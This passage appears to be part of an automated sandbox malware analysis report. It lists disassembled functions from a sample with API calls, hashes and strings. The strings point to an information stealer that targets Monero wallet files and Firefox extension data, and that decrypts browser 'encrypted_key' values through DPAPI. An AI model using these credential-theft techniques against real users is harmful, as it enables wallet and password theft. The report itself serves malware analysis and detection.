                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustPointer
                                        • String ID:
                                        • API String ID: 1740715915-0
                                        • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction ID: 4edd928de7331c23b1e368dcef165b87e4385cf14b9b871b721b2b5f832b272a
                                        • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                        • Instruction Fuzzy Hash: 5551C372500206AFEB298F54C869BBB7FA5FF41312F24452EED0687991E731ED44DB90
                                        Function 004EA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004EA664
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocallstrcpy
                                        • String ID: @$v10$v20
                                        • API String ID: 2746078483-278772428
                                        • Opcode ID: b1bdeb5edb35497b3d8d48cb1dd551592d5f481e602b8562523e1b3208e5c455
                                        • Instruction ID: 07e26babe9157221fd929891bc9a7b15bf97c5cc274526c68b805e21af8f2019
                                        • Opcode Fuzzy Hash: b1bdeb5edb35497b3d8d48cb1dd551592d5f481e602b8562523e1b3208e5c455
                                        • Instruction Fuzzy Hash: 60516D70A0024CEFDB14DFA5CD96FED7775BF40344F008019EA0A5B291DB78AA15CB5A
                                        Function 004EF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00501678,00500D93), ref: 004EF64C
                                        • lstrlen.KERNEL32(00000000), ref: 004EF66B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        • Opcode ID: e0a8781fd184ca59a91e6e17172f79686a403d0204450fc086b5ba77a4f41dca
                                        • Instruction ID: 0b2639e3b37bc0a8b75b866b56847cc46098f197249f4510adcc2c269a8a7567
                                        • Opcode Fuzzy Hash: e0a8781fd184ca59a91e6e17172f79686a403d0204450fc086b5ba77a4f41dca
                                        • Instruction Fuzzy Hash: 43512FB2D0010C9ACB04FBA5DD96DFD7339AF54304F00856EF61A67195EE386A1CCB6A
                                        Function 004F37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: fb7bb41d6d9e99051ec075da613f343bc2dad5b9346805acf67ac6dcb32cba0b
                                        • Instruction ID: 7b4f9eb829b45eea3a565bcbe4bb4113e5e9d0eeceecd88c133b6e964263715c
                                        • Opcode Fuzzy Hash: fb7bb41d6d9e99051ec075da613f343bc2dad5b9346805acf67ac6dcb32cba0b
                                        • Instruction Fuzzy Hash: B1412DB1D0010D9BCB04EFA5D855EFEB778AF44305F00801EF61676291EB78AA15CBAA
                                        Function 004EA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004EA13C
                                          • Part of subcall function 004EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004EA161
                                          • Part of subcall function 004EA110: LocalAlloc.KERNEL32(00000040,?), ref: 004EA181
                                          • Part of subcall function 004EA110: ReadFile.KERNEL32(000000FF,?,00000000,004E148F,00000000), ref: 004EA1AA
                                          • Part of subcall function 004EA110: LocalFree.KERNEL32(004E148F), ref: 004EA1E0
                                          • Part of subcall function 004EA110: CloseHandle.KERNEL32(000000FF), ref: 004EA1EA
                                          • Part of subcall function 004F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004F8FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004EA489
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA23F
                                          • Part of subcall function 004EA210: LocalAlloc.KERNEL32(00000040,?,?,?,004E4F3E,00000000,?), ref: 004EA251
                                          • Part of subcall function 004EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA27A
                                          • Part of subcall function 004EA210: LocalFree.KERNEL32(?,?,?,?,004E4F3E,00000000,?), ref: 004EA28F
                                          • Part of subcall function 004EA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004EA2D4
                                          • Part of subcall function 004EA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 004EA2F3
                                          • Part of subcall function 004EA2B0: LocalFree.KERNEL32(?), ref: 004EA323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: f718b4ea12e9f07ae474e0a2937c7ba4333eac145069894b4f66beff48532a57
                                        • Instruction ID: 9ba75c58579066c5ac069ec82a84e265d5ac085ced1eb31d3987ed3e96564848
                                        • Opcode Fuzzy Hash: f718b4ea12e9f07ae474e0a2937c7ba4333eac145069894b4f66beff48532a57
                                        • Instruction Fuzzy Hash: 2D3160B6D00108ABCF04DB95DC45AFFB7B8AB58305F444919E901A7245E734AA14CB66
                                        Function 004F8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005005BF), ref: 004F885A
                                        • Process32First.KERNEL32(?,00000128), ref: 004F886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 004F8883
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • CloseHandle.KERNEL32(?), ref: 004F88F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 154eefe186d5a23e879bb6794bf45a60d067ba3b787525b38a51c2bb2a6a5bb1
                                        • Instruction ID: 8375212d6c234312dfd92c950ea31c57ab93db3dfb106dd21b615ac5396fc0ce
                                        • Opcode Fuzzy Hash: 154eefe186d5a23e879bb6794bf45a60d067ba3b787525b38a51c2bb2a6a5bb1
                                        • Instruction Fuzzy Hash: 7B312BB190111CABCB24EB95CC55FEEB778FB45744F10419EF20EA61A0DB386A44CFA5
                                        Function 0055FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0055FE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0055FE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 83c85681573846bd7ec83f7e60c419efec1e9569b5f2148e8d06c7647ca64d2e
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: BC01F53210ABA2EEFAB416745CDE96A3E48FB413B2734473AF912811F2EF514C459344
                                        Function 004FCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 004FCA7E
                                          • Part of subcall function 004FC2A0: __amsg_exit.LIBCMT ref: 004FC2B0
                                        • __getptd.LIBCMT ref: 004FCA95
                                        • __amsg_exit.LIBCMT ref: 004FCAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 004FCAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 96b287399e92011511dcad94a4e7daaf98c1bdad4bc4ac34d64b8d7fa281c480
                                        • Instruction ID: 7cb1af989952c1a070741b45537cc0c49e32ec7c0c26cc7e8b2ca80abb5acbd2
                                        • Opcode Fuzzy Hash: 96b287399e92011511dcad94a4e7daaf98c1bdad4bc4ac34d64b8d7fa281c480
                                        • Instruction Fuzzy Hash: CAF06231E4431D9BD621FBA9998677E36A0EF01718F11414FE604962D2CB6C694096DE
                                        Function 005604D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: 4c9c51c7120a8f987f7f39baeabcead1ceeb5c49ef32d10a1a77b26da3f7b8b0
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: A0417872900209AFCF16DF98DC81AAEBFB5FF58300F189099F905A7291E3359A50DF60
                                        Function 004F5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004F8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 004F51CA
                                        • lstrcat.KERNEL32(?,00501058), ref: 004F51E7
                                        • lstrcat.KERNEL32(?,01459030), ref: 004F51FB
                                        • lstrcat.KERNEL32(?,0050105C), ref: 004F520D
                                          • Part of subcall function 004F4B60: wsprintfA.USER32 ref: 004F4B7C
                                          • Part of subcall function 004F4B60: FindFirstFileA.KERNEL32(?,?), ref: 004F4B93
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC4), ref: 004F4BC1
                                          • Part of subcall function 004F4B60: StrCmpCA.SHLWAPI(?,00500FC8), ref: 004F4BD7
                                          • Part of subcall function 004F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004F4DCD
                                          • Part of subcall function 004F4B60: FindClose.KERNEL32(000000FF), ref: 004F4DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
